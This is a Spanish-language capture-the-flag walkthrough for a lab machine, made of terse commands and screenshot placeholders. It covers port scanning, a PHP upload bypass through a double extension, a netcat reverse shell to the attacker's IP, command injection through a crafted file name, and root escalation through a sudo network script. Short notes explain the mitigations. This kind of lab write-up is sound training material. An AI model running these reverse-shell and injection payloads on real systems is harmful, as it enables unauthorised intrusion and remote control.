nmap -A -p- -oA output 10.129.166.190 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA networked 10.129.166.190

nmap -sU -O -p- -oA networked-udp 10.129.166.190

nikto -h 10.129.166.190:80

Pasted image 20220122123851.png

Pasted image 20220122124144.png

nmap --script http-enum -p80 10.129.166.190 -oN webScan

Pasted image 20220122123808.png

http://10.129.166.190/backup

Pasted image 20220122124350.png

7z l backup.tar

Pasted image 20220122124528.png

http://10.129.166.190/upload.php

Pasted image 20220122124641.png

Subimos un jpeg y lo vemos en http://10.129.166.190/photos.php

Pasted image 20220122125014.png

mv index.jpeg index.php.jpeg

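En el archivo index.php.jpeg metemos código PHP.

Nota: si el servidor llega a ejecutar este archivo, presumiblemente el filtro de subida solo valida la extensión final y el tipo de imagen, y el servidor web trata como PHP cualquier nombre que contenga `.php`. La defensa es guardar las subidas con nombres generados por el servidor, en un directorio donde no se ejecute PHP, y limitar el handler de PHP a archivos que terminen en `.php`.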

Pasted image 20220122125307.png

http://10.129.166.190/uploads/index.php.jpeg?cmd=ls -al

Pasted image 20220122125632.png

nc -lvnp 443

http://10.129.166.190/uploads/index.php.jpeg?cmd=nc -e /bin/bash 10.10.14.135 443

Pasted image 20220122125952.png

script /dev/null -c bash

Después hacer un Ctrl+Z

stty raw -echo; fg

reset

El terminal type es: xterm

export TERM=xterm

export SHELL=bash

stty rows 44 columns 187

cat check_attack.php

Pasted image 20220122154746.png

touch 'nc -c bash 10.10.14.135 443'

nc -lvnp 443

Pasted image 20220122155202.png

script /dev/null -c bash

Después hacer un Ctrl+Z

stty raw -echo; fg

reset

El terminal type es: xterm

export TERM=xterm

export SHELL=bash

stty rows 44 columns 187

sudo -l

ls -l /usr/local/sbin/changename.sh

Pasted image 20220122160643.png

https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f

sudo /usr/local/sbin/changename.sh

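test bash

Nota: esta es la entrada que se escribe cuando el script pide un valor. Presumiblemente (a confirmar con la captura del script y el aviso enlazado) el script, que sudo permite ejecutar como root, escribe esa entrada sin sanear en un fichero de configuración de red que luego se interpreta como shell. La mitigación es validar estrictamente los valores (sin espacios ni metacaracteres) y no delegar por sudo scripts que aceptan texto libre.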

Pasted image 20220122161140.png
